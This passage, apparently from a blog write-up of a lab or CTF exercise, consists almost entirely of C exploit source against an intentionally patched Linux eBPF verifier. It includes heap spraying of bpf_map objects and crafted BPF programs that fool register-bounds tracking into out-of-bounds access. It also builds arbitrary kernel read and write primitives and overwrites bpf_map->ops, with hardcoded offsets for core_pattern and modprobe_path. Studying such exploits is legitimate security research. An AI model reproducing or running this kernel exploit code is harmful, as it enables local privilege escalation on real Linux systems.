      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
  }
  printf(&amp;#34;[+] mapfd: %d\n&amp;#34;, mapfd);
  printf(&amp;#34;[+] corrupted_map_fd: %d\n&amp;#34;, corrupted_map_fd);
  printf(&amp;#34;[+] bpf_map_addr: 0x%016lx\n&amp;#34;, bpf_map_addr);

  puts(&amp;#34;[*] Restore corrupted map...&amp;#34;);
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;h4 id=&#34;leak-addr-of-jit-code-using-oob-read--heap-spray&#34;&gt;Leak addr of JIT code using oob read &amp;amp; heap spray&lt;/h4&gt;



  &lt;div class=&#34;collapsable-code&#34;&gt;
    &lt;input id=&#34;254613798&#34; type=&#34;checkbox&#34; checked /&gt;
    &lt;label for=&#34;254613798&#34;&gt;
      &lt;span class=&#34;collapsable-code__language&#34;&gt;c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__title&#34;&gt;leak_jit_addr_using_oob_read.c&lt;/span&gt;
      &lt;span class=&#34;collapsable-code__toggle&#34; data-label-expand=&#34;Show&#34; data-label-collapse=&#34;Hide&#34;&gt;&lt;/span&gt;
    &lt;/label&gt;
    &lt;pre class=&#34;language-c&#34; &gt;
      &lt;code&gt;// Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    &amp;lt;               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    &amp;gt;               // `scalar_min_max_or` will handler the case
//    &amp;gt;               //__mark_reg32_known(dst_reg, var32_off.value);

#include &amp;lt;asm-generic/socket.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;linux/bpf.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;sys/socket.h&amp;gt;
#include &amp;lt;sys/syscall.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;time.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

#include &amp;#34;bpf_insn.h&amp;#34;

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue(&amp;#34;Press enter to exit...&amp;#34;);
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &amp;amp;attr);
  if (map_fd &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_CREATE)&amp;#34;);
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;amp;attr);
  if (res &amp;lt; 0) {
    fatal(&amp;#34;bpf(BPF_MAP_UPDATE_ELEM)&amp;#34;);
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&amp;amp;key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &amp;amp;attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts(&amp;#34;[*] Spray struct bpf_map...&amp;#34;);
  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &amp;amp;map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf2 - 1),  // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map-&amp;gt;ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  uint16_t ops_containing_ret_offset =
      (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) &amp;amp; 0xffff;
  printf(&amp;#34;ops_containing_ret_offset: 0x%x\n&amp;#34;, ops_containing_ret_offset);
  *(uint16_t*)(&amp;amp;buf[0xf0]) = ops_containing_ret_offset;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t jit_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i &amp;lt; sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &amp;amp;map_val);
    // printf(&amp;#34;ret: 0x%x, val: 0x%lx\n&amp;#34;, ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x10 &amp;lt;- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&amp;amp;key) = fp-0x10 &amp;lt;- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&amp;amp;val) = fp-0x18 &amp;lt;- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
    if (progfd &amp;lt; 0) {
      puts(&amp;#34;============[failed reason]============&amp;#34;);
      printf(&amp;#34;%s\n&amp;#34;, verifier_log);
      fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal(&amp;#34;socketpair&amp;#34;);
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
      fatal(&amp;#34;setsockopt&amp;#34;);
    }

    write(socks[1], &amp;#34;Hello&amp;#34;, 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &amp;amp;val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      jit_addr = val;
      corrupted_map_fd = cur_map_fd;
      return;
    }
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &amp;amp;map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &amp;amp;key(-&amp;gt;0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp;amp;
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known -&amp;gt;
      // ___mark_reg_known is called.
      // By this calling then r1&amp;#39;s min and max will be imm.
      // Because (~0xffffffff00000001) &amp;amp; 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) &amp;amp; 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&amp;amp;key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&amp;amp;val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &amp;amp;key, &amp;amp;val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)&amp;#34;GPL v2&amp;#34;,
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &amp;amp;prog_attr);
  if (progfd &amp;lt; 0) {
    puts(&amp;#34;============[failed reason]============&amp;#34;);
    printf(&amp;#34;%s\n&amp;#34;, verifier_log);
    fatal(&amp;#34;bpf(BPF_PROG_LOAD)&amp;#34;);
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal(&amp;#34;socketpair&amp;#34;);
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;amp;progfd, sizeof(int))) {
    fatal(&amp;#34;setsockopt&amp;#34;);
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &amp;amp;map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t jit_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts(&amp;#34;[-] Failed to find corrupted bpf_map&amp;#34;);
    return -1;
